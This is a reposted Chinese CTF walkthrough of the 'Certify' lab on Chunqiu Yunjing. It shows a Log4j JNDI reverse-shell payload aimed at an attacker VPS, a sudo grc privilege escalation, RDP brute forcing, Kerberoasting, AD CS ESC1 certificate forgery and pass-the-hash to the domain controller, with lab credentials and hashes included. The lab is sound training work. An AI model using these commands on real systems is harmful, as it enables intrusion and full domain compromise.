春秋云境Certify-WP【一遍过】

2024-03-11 16:10
文章标签 wp 一遍 春秋 云境 certify

本文主要是介绍春秋云境Certify-WP【一遍过】,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

flag01

fscan扫描

扫描可以看到一个solr,solr一般会有log4j漏洞,看到有log4j组件

触发点是action参数

/solr/admin/collections?action=

验证:

http://39.xx.xx.xx:8983/solr/admin/collections?action=${jndi:ldap://iszpua.dnslog.cn}

我是这样的,不知道为什么

其他人是这样的

证明存在log4j漏洞,利用JNDIExploit工具打

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i vps -p 8888

监听端口

nc -lvnp 9999

访问网站

http://39.xx.xx.xx:8983/solr/admin/collections?action=${jndi:ldap://175.xx.xx.xx:1389/Basic/ReverseShell/175.xx.xx.xx/9999}

获得shell

提权

sudo -l

发现grc可以免密sudo执行,查看提权手册

sudo /usr/bin/grc --pty /bin/sh

获得权限

在/root/flag/flag01.txt获得flag01

flag02

先用wget上传frp和fscan

信息收集:

start infoscan
(icmp) Target 172.22.9.7      is alive
(icmp) Target 172.22.9.19     is alive
(icmp) Target 172.22.9.47     is alive
(icmp) Target 172.22.9.26     is alive
[*] Icmp alive hosts len is: 4
172.22.9.47:80 open
172.22.9.7:80 open
172.22.9.19:80 open
172.22.9.47:22 open
172.22.9.19:22 open
172.22.9.47:21 open
172.22.9.7:135 open
172.22.9.26:445 open
172.22.9.47:445 open
172.22.9.7:445 open
172.22.9.26:139 open
172.22.9.7:139 open
172.22.9.47:139 open
172.22.9.7:88 open
172.22.9.26:135 open
172.22.9.19:8983 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo:
[*]172.22.9.7[->]XIAORANG-DC[->]172.22.9.7
[*] WebTitle: http://172.22.9.47        code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.22.9.26     DESKTOP-CBKTVMO.xiaorang.lab        Windows Server 2016 Datacenter 14393 
[*] WebTitle: http://172.22.9.19:8983   code:302 len:0      title:None 跳转url: http://172.22.9.19:8983/solr/
[*] NetBios: 172.22.9.7      [+]DC XIAORANG\XIAORANG-DC     
[*] 172.22.9.47  (Windows 6.1)
[*] NetInfo:
[*]172.22.9.26[->]DESKTOP-CBKTVMO[->]172.22.9.26
[*] WebTitle: http://172.22.9.19        code:200 len:612    title:Welcome to nginx!
[*] NetBios: 172.22.9.47     fileserver                          Windows 6.1 
[*] WebTitle: http://172.22.9.7         code:200 len:703    title:IIS Windows Server
[*] WebTitle: http://172.22.9.19:8983/solr/ code:200 len:16555  title:Solr Admin
[+] http://172.22.9.7 poc-yaml-active-directory-certsrv-detect

总结出下面的拓扑

172.22.9.7  DC域控
172.22.9.13 CA域内机器
172.22.9.19 当前机器
172.22.9.26 域内机器
172.22.9.47 文件服务器

开代理,先看172.22.9.47 文件服务器,刚好也开了445端口(TCP端口),直接可以连接

proxychains smbclient -L 172.22.9.47

查看共享文件

proxychains smbclient //172.22.9.47/fileshare

找到flag02.txt,直接get下来查看

flag03

把之前的数据库也get下来

打开查看,可以看到user表和member表

 

这里有几个用户名被修改成*了 因为都是些个人的账号密码,再联系前面扫到的三个3389端口,尝试爆破172.22.9.26(域控和CA域不大可能,172.22.9.26这个域内机器是最有可能的)

导出数据,编为字典user.txt和pass.txt,爆破

proxychains hydra -L user.txt -P pass.txt 172.22.9.26 rdp

没有爆成功。。

看wp得到两个账号

XIAORANG.LAB\zhangjian–i9XDE02pLVf
XIAORANG.LAB\zhangjian–fiAzGwEMgTY

远程连接失败

根据flag02的提示,要用到spn

这里先尝试查找下域用户下的spn

proxychains impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf

把凭证保存在hash.txt中,尝试hashcat破解
看了下hash类型(hashcat -h),符合13100

hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force

得到这样一个账户(另一个账户也是可以的)

XIAORANG.LAB\zhangxia
MyPass2@@6

再次远程连接172.22.9.26,成功,但是没有管理员权限,所以没什么用处

这时重新看看内网还有那些机器
172.22.9.13 CA域成员机
存在一台证书颁发服务器
域渗透中和证书服务器相关的利用有ESC1和ESC8

先利用Certipy工具查看证书情况

proxychains certipy find -u 'zhangxia@xiaorang.lab'  -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout
Certificate Authorities0CA Name                             : xiaorang-XIAORANG-DC-CADNS Name                            : XIAORANG-DC.xiaorang.labCertificate Subject                 : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=labCertificate Serial Number           : 43A73F4A37050EAA4E29C0D95BC84BB5Certificate Validity Start          : 2023-07-14 04:33:21+00:00Certificate Validity End            : 2028-07-14 04:43:21+00:00Web Enrollment                      : DisabledUser Specified SAN                  : UnknownRequest Disposition                 : UnknownEnforce Encryption for Requests     : Unknown
Certificate Templates0Template Name                       : XR ManagerDisplay Name                        : XR ManagerCertificate Authorities             : xiaorang-XIAORANG-DC-CAEnabled                             : TrueClient Authentication               : TrueEnrollment Agent                    : FalseAny Purpose                         : FalseEnrollee Supplies Subject           : TrueCertificate Name Flag               : EnrolleeSuppliesSubjectEnrollment Flag                     : PublishToDsIncludeSymmetricAlgorithmsPrivate Key Flag                    : ExportableKeyExtended Key Usage                  : Encrypting File SystemSecure EmailClient AuthenticationRequires Manager Approval           : FalseRequires Key Archival               : FalseAuthorized Signatures Required      : 0Validity Period                     : 1 yearRenewal Period                      : 6 weeksMinimum RSA Key Length              : 2048PermissionsEnrollment PermissionsEnrollment Rights               : XIAORANG.LAB\Domain AdminsXIAORANG.LAB\Domain UsersXIAORANG.LAB\Enterprise AdminsXIAORANG.LAB\Authenticated UsersObject Control PermissionsOwner                           : XIAORANG.LAB\AdministratorWrite Owner Principals          : XIAORANG.LAB\Domain AdminsXIAORANG.LAB\Enterprise AdminsXIAORANG.LAB\AdministratorWrite Dacl Principals           : XIAORANG.LAB\Domain AdminsXIAORANG.LAB\Enterprise AdminsXIAORANG.LAB\AdministratorWrite Property Principals       : XIAORANG.LAB\Domain AdminsXIAORANG.LAB\Enterprise AdminsXIAORANG.LAB\Administrator[!] VulnerabilitiesESC1                              : 'XIAORANG.LAB\\Domain Users' and 'XIAORANG.LAB\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication

虽然默认也有 ESC8, 但是因为 AD DS 和 AD CS 是在同一台机器上的, 所以无法进行 NTLM Relay

下面利用 ESC1

申请 XR Manager 证书模版并伪造域管理员,得到administrator.pfx

proxychains certipy req -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca 'xiaorang-XIAORANG-DC-CA' -template 'XR Manager' -upn 'administrator@xiaorang.lab'

利用administrator.pfx证书获取 TGT 和 NTLM Hash

proxychains certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7

NTLM:2f1b57eefb2d152196836b0516abea80

获得flag

proxychains  crackmapexec smb 172.22.9.26 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

flag04

最后获得域控的flag04

proxychains crackmapexec smb 172.22.9.7 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"

或者

proxychains impacket-wmiexec -hashes :2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7

这篇关于春秋云境Certify-WP【一遍过】的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/798327

相关文章

C++中const关键字的使用方法,烦透了一遍一遍的搜,总结一下,加深印象!!!

之前一直在学习C/C++,关于const的使用,这里出现一点,那里出现一点。知识用时方恨少,这一段时间正好各种笔试题,其中关于const的用法也是层出不穷,所以疲于在书本上各种翻,这里汇总一下,加深自己的印象的同时,也方便以后查阅和学习。菜鸟一个,若有错误,望指正! const关键字 常类型是指使用类型修饰符const说明的类型,常类型的变量或对象的值是不能被更新的。不管出现在任何上

BUUCTF PWN wp--bjdctf_2020_babystack

第一步   checksec一下,该题是64位的,该题目大概率是一道栈溢出(因为题目里面提到了stack) 分析一下这个二进制保护机制: Arch: amd64-64-little 这表示二进制文件是为64位AMD处理器设计的,使用的是小端序(little-endian)格式。RELRO: Partial RELRO RELRO(Relocation Read-Only)是一种安全特性,旨

【C++】将myString类中能够实现的操作都实现一遍

myString.h #ifndef MYSTERAM_H#define MYSTERAM_H#include <iostream>#include<cstring>using namespace std;class myString{private:char *str; //字符串int size; //字符串容量char error[20] = "error";publ

WordPress 后台缓存插件:WP Admin Cache提高缓存页面

使用WordPress建站会安装一些静态缓存插件,比如:WP Rocket、Cache Enabler、Comet Cache、W3 Total Cache、WP Super Cache、WP Fastest Cache、Hyper Cache等等,这些都用于缓存前端。 今天介绍一款专门用于缓存后台的插件:WP Admin Cache。 启用后,提速效果还是很明显,比如后台所有文章页面秒开

玄机——第九章-Where-1S-tHe-Hacker wp

文章目录 一、前言二、概览三、参考文章四、步骤(解析)准备步骤#1.0步骤#1通过本地 PC RDP到服务器并且找到黑客ID 为多少,将黑客ID 作为 FLAG 提交; 步骤#2通过本地 PC RDP到服务器并且找到黑客在什么时间修改了网站主页,将黑客修改了网站主页的时间 作为 FLAG 提交(y-m-d-4:22:33); 步骤#3通过本地 PC RDP到服务器并且找到黑客第一个websh

VS2013怎么配置opencv才能不用每次都重新配置一遍?

作者:彭杰Jay 链接:https://www.zhihu.com/question/24400428/answer/88284063 来源:知乎 先记录,试验后再来补充。

wp-autopost-pro 3.7.8最新完美版

插件简介: 插件是wp-autopost-pro 3.7.8最新版本。 采集插件适用对象 1、刚建的wordpress站点内容比较少,希望尽快有比较丰富的内容; 2、热点内容自动采集并自动发布; 3、定时采集,手动采集发布或保存到草稿; 4、css样式规则,能更精确的采集需要的内容。 5、伪原创与翻译、代理IP进行采集、保存Cookie记录; 6、可采集内容到自定义栏目 代码下载

从头到尾快速学习一遍Linux,高级工程师多年实践实战经验精华总结和实例示例,第三章:概念释义

从头到尾快速学习一遍Linux,高级工程师多年实践实战经验精华总结和实例示例,第三章:概念释义。 第三章 概念释义 理解 Linux 中的基本概念,讲解详细深入。 压缩与解压 #################################### “小王,把我们郊游的照片压缩一下,发给我”,压缩文件在使用电脑时经常见到。将文件压缩不只是为了节省硬盘空间,同时也可以节省网络传输时间

玄机——第九章-Where-1S-tHe-Hacker-part2 wp

文章目录 一、前言二、概览三、参考文章四、步骤准备步骤#1.0步骤#11.最早的WebShell落地时间是(时间格式统一为:2022/12/12/2:22:22); 步骤#22.黑客最早的WebShell密码是多少,将WebShell密码作为Flag值提交; 步骤#33.CobaltStrike木马被添加进计划任务的时间是 步骤#44.黑客启用并添加进管理员组的用户与时间是 答案格式:Use

攻防世界-web题型-7星难度汇总-个人wp

Web_php_wrong_nginx_config 这个题目nginx配置错误 随便输入显示网站还没建设好。。。 先信息收集一下 换了个无敌好看的终端 没想到7星了还玩这些。。。 看了admin的页面需要先登录 现在的问题是如果读取到这个文件 这个hack的文件也没有东西 到此就不知道了,看wp 没想到在hack的cookie里,我看了cookie我当时看到l